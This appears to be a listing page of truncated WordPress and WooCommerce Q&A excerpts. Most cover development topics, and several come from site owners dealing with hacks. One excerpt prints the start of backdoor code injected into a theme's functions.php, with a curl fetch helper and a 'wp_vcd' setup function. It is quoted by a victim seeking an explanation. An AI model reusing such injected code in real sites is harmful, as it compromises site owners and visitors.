How can I reference external attachments without breaking core WordPress files?

I am developing a site that uses WooCommerce & WordPress to show a fair amount (10,000+) of products, and can't accommodate the size of all the images for the products. So, I'm leaving the images on their CDN, and making all the image attachments references to the external URLs. This required a bit of hacking, as WooCommerce/WordPress will try to take the images and upload them and set the attachment URL to a local relative path (e.g., 2018/02/), and then when …
Category: Web

Adding custom fields (post meta) before/during wp_insert_post()

Our code base has a ton of logic that executes as the post is inserted/created. However, some of that logic depends on custom post meta. The only way I know of to add post meta to a new post is like so: $post_id = wp_insert_post($post_obj); add_post_meta($post_id, 'key', "value"); However, this means that the post meta is not present when hooks on post insertion happen. Is there any way to set up or include post meta as part of $post_obj? I …
Category: Web

malware undetectable by multiple scans

I would like to inform the community and request help. This malware was in the folder /wp-content/uploads/2020/, named index.php. And I found it in the year 2017 in the uploads folder. What I find strange is that it was not detectable by any online database, and not even by the Sucuri plugin or Wordfence. The code follows (a good part of it was deleted because it did not fit in the post). Below …
Category: Web

db.php, is it a legit file

On one of the WP installations I troubleshoot (because the site is down, too many DB connections), there is an ADDED file at the root (with wp-config.php and others). This file is called db.php. It's 280 KB in size and contains some cheesy data, here is a sample. A usual Google search doesn't reveal it's a hack, but does not reveal it's a LEGIT WP file anyway... so the question is, what do I do with it... sorry for the "garbage …
Category: Web

Multiple wp_options tables to share content across installs

My application has >10 user_roles, each able to perform completely different tasks, provided with a custom backend and no access to wp-admin. The extra functionality each user_role gets to use is handled via multiple plugins. Each user_role interacts on the same data (posts, taxonomies etc.). The idea I had is to use a single installation per one or more user_roles connected to a single database to share users, posts etc. but with different plugins loaded, so simply a separate wp_options …
Category: Web

Intercept comment form submit/list by hook/filter

I am writing a media plugin that uses custom tables to store its contents (e.g. not the post tables where WordPress stores its attachment data). Now I'm looking for a way to use the default WordPress comment system to add comments to it. (These comments will not be in the regular comment table but also a custom table.) I need two things: A hook that allows me to intercept the comment submit and process it with my own code if …
Category: Web

Add Download Button in prettyPhoto Plugin

I would like to add a download button link for the full-sized image on the prettyPhoto lightbox when a user views a photo on my site. Currently I use the prettyPhoto Media plugin on my site, and I have also used this code (taken from this post) in order to allow prettyPhoto to view a smaller image than the full sized image in galleries so the loading time will be better: function oikos_get_attachment_link_filter( $content, $post_id, $size, $permalink ) { // …
Category: Web

How to show WooCommerce swatch color name when hovered or selected

I have the woocommerce plugin and the woocommerce swatches and photos extension that shows swatches instead of variations as a drop down. When hovering over the swatches and when a swatch is selected, I would like to be able to see the name of the color above the color table. enter link description here like the link above please and thank you for your help
Category: Web

Someone is trying to hack my website, need guidance

There are multiple IPs that are trying to access my directories. I am using iThemes Security plugin and it shows the following lists. These are the files all of the IPs are trying to access every minute. https://www.{My Website Name}.com/tag/feed/ https://www.{My Website Name}.com/premium-titanium/undefined https://www.{My Website Name}.com/wp-content/uploads/2017/11/supra-on-wood.jpg https://www.{My Website Name}.com/product/classic-sports-piece/ http://www.{My Website Name}.com/wp-content/plugins/apikey/wp-surf.php?test=hello There are a total of 2700+ entries and they are increasing minute by minute. Is there any way that I can block any IP that accesses these URLS? …
Category: Web

Add class to before_widget from within a custom widget

I have a simple custom widget that asks for its width (that is used later in the front end). The width field is a select dropdown, so a user has predefined options. I will have many instances of my widget, each will have its own width setup. Now, in my widget code I have the following code: echo $before_widget; which results in: <div class="widget my" id="my-widget-1"></div> What I'd like to do is somehow hook into $before_widget and add my own …
Category: Web

What does this code do? (Injected code hacked)

The code below was injected into my WordPress theme's functions.php. Can someone explain to me what the code does, and how that was done? $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) …
Category: Web

How to Supply Console Logs Data into the WooCommerce Cart?

I am using a third-party gadget that provides live availability, cost and a book now button. When a customer clicks on the book now button, it redirects to their website, which I want to ignore. After doing some Google research, I am able to get the correct Title & cost in the console logs when someone clicks on the book now button. $w.event.subscribe("item.book.click", function(item) { console.log(item); console.log("Title " + item[3].Name + " (Date " + item[4].date + ", Period " + …
Category: Web

How to activate a plugin inside a theme

I am trying to activate a plugin which is inside my theme template directory, i.e. I have a folder called plugin inside my current theme, which has some plugins. How can I activate those plugins from the current plugins options?
Category: Web

Being hacked. Is there a list of WordPress security holes I can check against?

I observe a file being uploaded into various plugin folders in my WordPress site. The file is used to send out spam from my server and every time I remove it it gets uploaded to another folder. There are hundreds of IP addresses accessing the file, so blocking them may not really prove useful if the attackers have a huge pool of IP addresses. However, I have another two sites that use platforms other than WordPress and they are not …
Category: Web

How to stop repeated hack on header.php of custom theme?

Noticed some unwanted files in the website root folder and removed them. I have found that the header.php file has some malicious code which redirects to spam sites only on mobile browsers. When these files exist, .htaccess pretty permalinks do not work. I have changed cPanel and FTP passwords. Deleted the unwanted files listed below. Scanned all the files and folders. After a clean installation of WordPress and plugins, these files are added repeatedly. Server: shared hosting / linux server File Transfers using …
Category: Web

Security issues with WP sites

I have just had to deal with a few of my WordPress websites being hacked. First time put an index.html file in the cpanel of each site and replenished my admin user. Once I felt I cleaned this up, it's happened once again but it changed my title tag to "Hacked by Bala Sniper" and the widgets from the footer of each website were removed. My WHM account isn't WP only websites so I know it can't be a hacker …
Category: Web

Admin user lacks admin permissions after hack and can't reinstate

My site (4.5.3 on Apache/Linux) was hacked, I suspect something like the one described here. As best I can tell I've removed or at least disabled the hack, however admin users aren't able to perform actions like updating WordPress, adding plugins, etc. So far, I have tried: Editing the existing admin user's permissions via phpMyAdmin. Adding a completely new admin user via phpMyAdmin. Overwriting core WP files with those from a fresh download (of the same version currently installed). Disabled …
Category: Web

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.